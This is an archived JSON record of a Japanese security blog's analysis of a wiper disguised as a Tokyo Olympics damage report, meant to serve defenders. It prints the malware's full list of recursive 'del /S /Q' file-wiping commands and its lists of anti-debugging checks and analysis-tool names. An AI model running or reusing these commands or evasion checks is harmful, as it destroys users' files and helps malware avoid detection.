{
	"id": "360366c3-3e60-4c46-9593-33febd382152",
	"created_at": "2026-04-06T02:12:17.727909Z",
	"updated_at": "2026-04-10T03:21:48.013214Z",
	"deleted_at": null,
	"sha1_hash": "411f3ce127c5932a9c1eb6b29aaf610046c94472",
	"title": "東京五輪に関係する日本語のファイル名を持つマルウェア(ワイパー)の解析 | 技術者ブログ | 三井物産セキュアディレクション株式会社",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1822590,
	"plain_text": "東京五輪に関係する日本語のファイル名を持つマルウェア(ワイ\r\nパー)の解析 | 技術者ブログ | 三井物産セキュアディレクション\r\n株式会社\r\nArchived: 2026-04-06 01:34:51 UTC\r\n東京五輪に関係するファイルを装った以下のファイル名を持つマルウェアが2021年07月20日(火) 15時\r\n頃、VirusTotalにアップロードされたことを確認しました。\r\n【至急】東京オリンピック開催に伴うサイバー攻撃等発生に関する被害報告について.exe\r\n早速ですが、本記事では該当検体の解析結果を共有します。\r\n該当のファイルはVirusTotalにフランスからアップロードされており、ジェネリック検出が多いものの\r\nすでに複数のアンチウイルス製品によって検知されていることを確認しています。\r\n図１　VirusTotalにアップロードされた不審なファイル\r\n上記のファイルのプロパティには以下の通り何も情報が付与されていません。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 1 of 12\n\n図２　プロパティ情報\r\n該当ファイルはアイコンを見る限りPDFのように見えますが、アイコン偽装されており、フォルダの詳\r\n細表示で見た場合は以下のように拡張子がEXEであることがわかります。\r\n図３　フォルダの詳細表示で見た場合のファイルの様子\r\nしかしファイル名が長いことで、フォルダの表示方法によっては以下のように拡張子が見えなくなる\r\nため、アイコンだけで判断し誤って実行してしまう可能性があります。\r\n図4　拡張子が見えなくなる表示方法の例\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 2 of 12\n\nそれではファイルを解析していきますが、このマルウェアはUPXでパッキングされています。\r\n図５　UPXでパッキングされた実行ファイル\r\nアンパック後のファイルはVisual C++で開発されたEXEであることがわかります。\r\n図６　UPXをアンパッキングした実行ファイル\r\nこのマルウェアは実行されると以下の項目などにより、自身が解析環境で動かされていないか、また\r\nは自身が解析されていないかを確認する多数のアンチデバッグ機能があります。\r\n1. GetTickCountによるコードの処理経過時間のチェック(指定時間以上かどうか)\r\n2. GetTickCountによるコードの処理経過時間のチェック(指定時間以内かどうか)\r\n3. IsDebuggerPresentを用いた解析チェック\r\n4. CheckRemoteDebuggerPresentを用いた解析チェック\r\n5. VMwareのバックドアI/Oポートを用いた仮想環境チェック\r\n6. PEBのNtGlobalFlagを用いたデバッグチェック\r\n7. Windowクラスを用いた多数の解析ツールの起動チェック\r\n8. プロセス名による多数の解析ツールの起動チェック\r\n9. ドライバの存在確認を用いたProcessMonitorの起動チェック\r\n上にあげたそれぞれのアンチデバッグ機能を含め、以下に処理の流れを解説していきます。\r\nまず、GetTickCountによるコードの処理経過時間のチェックですが、現在の時間を取得（αとする）し\r\nた後、16秒間スリープを実施、その直後の時間(βとする)の時間を取得し、αとβの時間の差分を計算し\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 3 of 12\n\nます。そしてその計算結果が15秒未満の数値になっていた場合は、サンドボックスなどのアンチデバ\r\nッグ対策でスリープ短縮が行われていると判断し、マルウェアは終了します。\r\n図7　GetTickCountによるコードの処理経過時間のチェック\r\n以下は15秒未満となっているかを確認する処理部分です。\r\n図8　15秒未満かどうかをチェックする処理\r\nその後、IsDebuggerPresentおよびCheckRemoteDebuggerPresentを用いて自身が解析されているかどうか\r\nをチェックします。\r\nまたこの際、4.5秒以内に処理が通過しないと解析していると判断し自身を終了します。\r\n図9 IsDebuggerPresentおよびCheckRemoteDebuggerPresentによるチェック\r\nまた、以下の命令 (0x5658 = “VX”)を用いてVMwareのバックドアI/Oポートをチェックすることで仮想\r\n環境でないかをチェックします。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 4 of 12\n\n図10 VMwareのバックドアI/Oポートをチェックする処理\r\nそして、PEBのNtGlobalFlagという値をチェックすることでデバッグ中かを確認します。プログラムが\r\nデバッグされている場合はNtGlobalFlagの値が0x70(112)になるためその値になっているかどうかをチェ\r\nックしています。\r\n図11 NtGlobalFlagをPEBから取得する処理\r\n図12 NtGlobalFlagの値が0x70(112)かどうかをチェックする処理\r\nさらに、GetClassNameAとEnumWindowsというWindowsAPIを使用し、以下の文字列を含むWindowクラ\r\nスをチェックすることでマルウェア解析ツールが起動していないかどうかを確認します。\r\n\"PROCMON_WINDOW_CLASS\"\r\n\"OllyDbg\"\r\n\"TIdaWindow\"\r\n\"WinDbgFrameClass\"\r\n\"FilemonClass\"\r\n\"ID\"\r\n\"RegmonClass\"\r\n\"PROCEXPL\"\r\n\"TCPViewClass\"\r\n\"SmartSniff\"\r\n\"Autoruns\"\r\n\"CNetmonMainFrame\"\r\n\"TFormFileAlyzer2\"\r\n\"ProcessHacker\"\r\nこのWindowクラスを用いて検索する手口は従来からあるものの、一般的なプロセス名を用いてチェッ\r\nクする方法よりも変更しづらい情報のため効果的であると言えます。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 5 of 12\n\n図13 EnumWindowsによるウインドウクラス列挙\r\n以下は、WindowクラスをGetClassNameにより取得し比較する処理部分となります。\r\n図14 GetClassNameAで比較するウインドウクラス名\r\nその後、マルウェア解析ツールである以下のプロセス名が起動していないかをチェックします。これ\r\nらのリストを見ると比較的網羅性の高いマルウェア解析ツールのリストとなっており、執拗に解析さ\r\nれないようにしていることがわかります。\r\nWireshark.exe\r\napateDNS.exe\r\nAutoruns.exe\r\nbindiff.exe\r\nidaq.exe\r\nidaq64.exe\r\nProcmon.exe\r\nx64dbg.exe\r\nx32dbg.exe\r\nollydbg.exe\r\nImmunityDebugger.exe\r\nVBoxTray.exe\r\nVBoxService.exe\r\nmsedge.exe\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 6 of 12\n\nVirtualBox.exe\r\njavaw.exe\r\nx96dbg.exe\r\nidaw.exe\r\nwindbg.exe\r\ndnSpy.exe\r\nHxD.exe\r\nScylla_x64.exe\r\nScylla_x86.exe\r\nregmon.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nTcpview.exe\r\nsmsniff.exe\r\nFakeNet.exe\r\nnetmon.exe\r\nPEiD.exe\r\nLordPE.exe\r\nPE-bear.exe\r\nPPEE.exe\r\ndie.exe\r\ndiel.exe\r\npexplorer.exe\r\ndepends.exe\r\nResourceHacker.exe\r\nFileAlyzer2.exe\r\nprocesshacker.exe\r\nRegshot-x64-Unicode.exe\r\n以下は上記のプロセスチェックに関する挙動の処理です。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 7 of 12\n\n図15 プロセスチェックを行う処理\r\nその後、以下のProcess Monitorに関するデバイスファイルの存在をチェックすることで、念を重ねて解\r\n析環境ではないかを確認する挙動があります。\r\n\\\\\\\\.\\\\Global\\\\ProcmonDebugLogger\r\n図16 Process Monitorに関するデバイスファイルの存在チェック\r\nこれら一連のアンチデバッグチェックを全て終えると以下のメイン処理に遷移します。\r\n■メインの処理\r\nこのマルウェアのメインとなる目的はユーザーのファイルを削除することであり、＜ユーザーフォル\r\nダ＞配下(サブフォルダも含む)にある全ての対象ファイルを削除します。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 8 of 12\n\nその際に削除対象となる具体的な削除対象の拡張子を含む、全てのコマンドは以下となります。これ\r\nらを見ると文書系ファイルが削除対象として多く並んでいることがわかります。\r\n\"del /S /Q *.doc c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.docm c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.docx c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.dot c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.dotm c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.dotx c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.pdf c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.csv c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.xls c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.xlsx c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.xlsm c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.ppt c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.pptx c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.pptm c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.jtdc c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.jttc c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.jtd c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.jtt c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.txt c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.exe c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n\"del /S /Q *.log c:¥¥users¥¥%username%¥¥ \u003e nul\"\r\n削除はsystemコマンドを用いて以下のように行われます。\r\n図17 Word文書ファイルを削除する処理の例\r\n気になる特徴として、本マルウェアは以下のように日本で使用される一太郎の文書ファイルが削除対\r\n象に含まれていることから、日本の環境での実行を想定していることが推測されます。\r\n図18 一太郎文書ファイルを削除する処理\r\n動作中は、ファイルの削除操作を示す以下のコマンド文字列が画面に表示されます。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 9 of 12\n\n図19 画面に表示されるウインドウ\r\nまた、curlコマンドを用いて海外の成人用サイトへのアクセスを見えないように裏で発生させます。こ\r\nの際、サイレントを意味する-sコマンドが用いられます。\r\n図20 curlコマンドの処理\r\n上記curlコマンドは環境により32回または64回繰り返します。\r\n成人向けのサイトへのアクセスを裏で発生させつつファイルを破壊するという一連の処理から、そう\r\nした海外サイトへの不用意なアクセスにより事故的に発生したインシデントのように見せかけようと\r\nする意図も垣間見えます。\r\n最後に以下のコマンドによりcmd.exeを使用して自身を削除し終了します。\r\n（解析環境であると判断された場合もこの処理に遷移します）\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 10 of 12\n\n図21 自身を削除する処理\r\n本マルウェアの挙動は以上となります。\r\nこのマルウェアはアイコン偽装されていることや、ユーザーフォルダ配下のみを削除対象とすること\r\nから、管理者権限を持たないユーザーの手によって感染させる意図があると考えられます。\r\nまたこのマルウェアは、ファイルを削除するというメイン挙動から、削除や破壊を目的とするマルウ\r\nェアの一種「ワイパー」であると言えます。ワイパーはその挙動からランサムウェアと見間違えるケ\r\nースもありますが、それぞれ目的が大きく異なり、平昌オリンピックにおいてOlympicDestroyerという\r\nワイパーが出現したように、オリンピックのようなイベントにおいてはランサムウェアと同時にワイ\r\nパーも注意すべきマルウェアと言えるでしょう。\r\nなお、このマルウェアが実際の攻撃を意図して用意されたものかどうかは不明ですが、こうして見て\r\nみると、不自然に映るほど様々なアンチデバッグを寄せ集めて作ったように見え、まるで対応者の解\r\n析能力をはかるCTFの検体を模倣したもののようにも感じます。万一この検体がいたずらで作成された\r\nものであったとしても、実際に破壊を発生させるという行為は事実であり、他のマルウェアと変わら\r\nぬ明確な脅威であることに変わりはありません。\r\n※参考情報として、プログラムの開発時間を示すTime Date Stampは2021-07-20 05:52:05(UTC)であり、\r\nVirusTotalへのサブミッションは2021-07-20 06:02:18(UTC)であることが確認されています。Time Date\r\nStampは偽装することが可能であるため断言はできませんが、これらの時系列を信頼するならばこのマ\r\nルウェアは作成されてまもなく10分程でVirusTotalにアップロードされた可能性があり得ます。\r\nその他、東京オリンピックの生中継を装ったフィッシングサイトが続々と出現している状況も見えて\r\nいますが、従来から言われている通り話題性のあるイベント期間はそれに便乗した脅威が多数出てく\r\nる可能性が高いため、引き続き類似の便乗マルウェアも含め注視が必要です。\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 11 of 12\n\nハッシュ値：\r\nSHA-256：fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97\r\nSource: https://www.mbsd.jp/research/20210721/blog/\r\nhttps://www.mbsd.jp/research/20210721/blog/\r\nPage 12 of 12\n\n  https://www.mbsd.jp/research/20210721/blog/\nその際に削除対象となる具体的な削除対象の拡張子を含む、全てのコマンドは以下となります。これ  \nらを見ると文書系ファイルが削除対象として多く並んでいることがわかります。  \n\"del /S /Q *.doc c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.docm c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.docx c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.dot c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.dotm c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.dotx c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.pdf c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.csv c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.xls c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.xlsx c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.xlsm c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.ppt c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.pptx c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.pptm c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.jtdc c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.jttc c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.jtd c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.jtt c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.txt c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.exe c:¥¥users¥¥%username%¥¥ \u003e nul\"\n\"del /S /Q *.log c:¥¥users¥¥%username%¥¥ \u003e nul\"\n削除はsystemコマンドを用いて以下のように行われます。  \n図17 Word文書ファイルを削除する処理の例  \n気になる特徴として、本マルウェアは以下のように日本で使用される一太郎の文書ファイルが削除対  \n象に含まれていることから、日本の環境での実行を想定していることが推測されます。  \n図18 一太郎文書ファイルを削除する処理  \n動作中は、ファイルの削除操作を示す以下のコマンド文字列が画面に表示されます。  \n  Page 9 of 12",
	"extraction_quality": 1,
	"language": "JA",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mbsd.jp/research/20210721/blog/"
	],
	"report_names": [
		"blog"
	],
	"threat_actors": [],
	"ts_created_at": 1775441537,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/411f3ce127c5932a9c1eb6b29aaf610046c94472.pdf",
		"text": "https://archive.orkl.eu/411f3ce127c5932a9c1eb6b29aaf610046c94472.txt",
		"img": "https://archive.orkl.eu/411f3ce127c5932a9c1eb6b29aaf610046c94472.jpg"
	}
}